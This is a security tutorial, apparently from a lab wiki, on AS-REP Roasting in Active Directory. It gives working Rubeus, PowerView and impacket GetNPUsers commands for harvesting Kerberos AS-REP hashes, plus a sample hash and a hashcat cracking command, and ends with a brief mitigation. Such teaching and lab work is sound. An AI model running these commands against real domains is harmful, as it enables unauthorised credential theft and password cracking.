Comment on page
AS-REP Roasting Attack

Definition
AS-REP Roasting is an attack against Kerberos for user accounts that do not require pre-authentication. preauthentication is the first step in Kerberos authentication, and is designed to prevent brute-force password guessing attacks.
Theory & Background
During preauthentication, a user will enter their password which will be used to encrypt a timestamp, send that to domain controller and then the domain controller will attempt to decrypt it and validate request. From there, the TGT will be issued for the user to use for future authentication.
The AS-REP response has two parts one is the TGT ticket encrypted using the KRBTGT Account's NTLM hash and another one is the session key (enc-part in image 2) which is encrypted using user account's NTLM hash. If preauthentication isn’t enabled, an attacker can send an AS-REQ for any user that doesn’t have preauth required and receive a bit of encrypted material back that can be cracked offline to reveal the target user’s password. If you’re already an authenticated (but otherwise unprivileged) user, you can easily enumerate what users in the domain have this setting with the LDAP filter (userAccountControl:1.2.840.113556.1.4.803:=4194304).
Luckily, preauthentication is required by default in Active Directory. However, this can be controlled by a user account control setting on every user account
[email protected] configured with 'Do not require Kerberos preauthentication'
Snapshot of wireshark
My Lab environment for this lab is:
1.[email protected] - User with kerberos preauthentication disabled
2.redwolf-dc -  Domain Controller
Abuse
There are so many tools that can be used to perform AS-REP Roasting attack, however i will be demonstrating with Rubeus (for windows) and GetNPUsers.py (for linux) from impacket scripts.
Execution with Rubeus
Users that have Pre-Authentication disabled (This command requires powerview to be loaded on the memory)
Get-DomainUser -PreauthNotRequired
Then we can use Rubeus.exe to dump the session key present in AS-REP
.\Rubeus.exe asreproast /nowrap
Execution with GetNPUsers
Install the impacket scripts 
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
sudo python3 ./setup.py install
Enumerate the list of users present in the domain and use it while executing GetNPUsers.py 
GetNPUsers.py REDWOLF.LOCAL/[email protected] -dc-ip 192.168.62.2
Cracking the AS-REP Hash 
Say this is the hash we get for the potential victim:
[email protected]:0AC0F9425FEA56FBDC65EDC84DA88275$1BBC8576E21155EA6DBF234B22860EB2887A283E7F4CCFBDFA09DB48354C7533CF5DCC1E5929A11FAEC8A7BE5178758811606A75964DBD7A348F123ED2E64DC53434A660B5789B533DE90E049CC1F4DDD0E1D72778796EB22F1BB2DA4F7DB1CBC6705D8DC6360396F7C0586C1CC615E1CF8F666D6986D22C35852A981111B195F3248FB4D69B60999E642BE15099DA3FFFC4844A002B5491E15FDF76B3E88355846DAE95E8F5953BEC64AD8C52D5F3C02C07CD6B60B9D653AE9FB6731C73F01AE9AD06127E89CA6ECB6549CCEC10B9001C45267DF7877EBE11D15C92811CC71B103836257447E3579A4820102213
We need into insert 23  after $krb5asrep$ 
[email protected]:0AC0F9425FEA56FBDC65EDC84DA88275$1BBC8576E21155EA6DBF234B22860EB2887A283E7F4CCFBDFA09DB48354C7533CF5DCC1E5929A11FAEC8A7BE5178758811606A75964DBD7A348F123ED2E64DC53434A660B5789B533DE90E049CC1F4DDD0E1D72778796EB22F1BB2DA4F7DB1CBC6705D8DC6360396F7C0586C1CC615E1CF8F666D6986D22C35852A981111B195F3248FB4D69B60999E642BE15099DA3FFFC4844A002B5491E15FDF76B3E88355846DAE95E8F5953BEC64AD8C52D5F3C02C07CD6B60B9D653AE9FB6731C73F01AE9AD06127E89CA6ECB6549CCEC10B9001C45267DF7877EBE11D15C92811CC71B103836257447E3579A4820102213
Then we can use john or hashcat tool to crack the hash
hashcat -m 18200 '[email protected]:0AC0F9425FEA56FBDC65EDC84DA88275$1BBC8576E21155EA6DBF234B22860EB2887A283E7F4CCFBDFA09DB48354C7533CF5DCC1E5929A11FAEC8A7BE5178758811606A75964DBD7A348F123ED2E64DC53434A660B5789B533DE90E049CC1F4DDD0E1D72778796EB22F1BB2DA4F7DB1CBC6705D8DC6360396F7C0586C1CC615E1CF8F666D6986D22C35852A981111B195F3248FB4D69B60999E642BE15099DA3FFFC4844A002B5491E15FDF76B3E88355846DAE95E8F5953BEC64AD8C52D5F3C02C07CD6B60B9D653AE9FB6731C73F01AE9AD06127E89CA6ECB6549CCEC10B9001C45267DF7877EBE11D15C92811CC71B103836257447E3579A4820102213' ~/Wordlist/rockyou.txt
Mitigation
Uncheck 'Do not require Kerberos preauthentication' in the Account Options of the user account
References
​https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat​
​https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/​
​https://stealthbits.com/blog/cracking-active-directory-passwords-with-as-rep-roasting/​
Kerberos Authentication Explained
Kerberoasting Attack
Last modified 2yr ago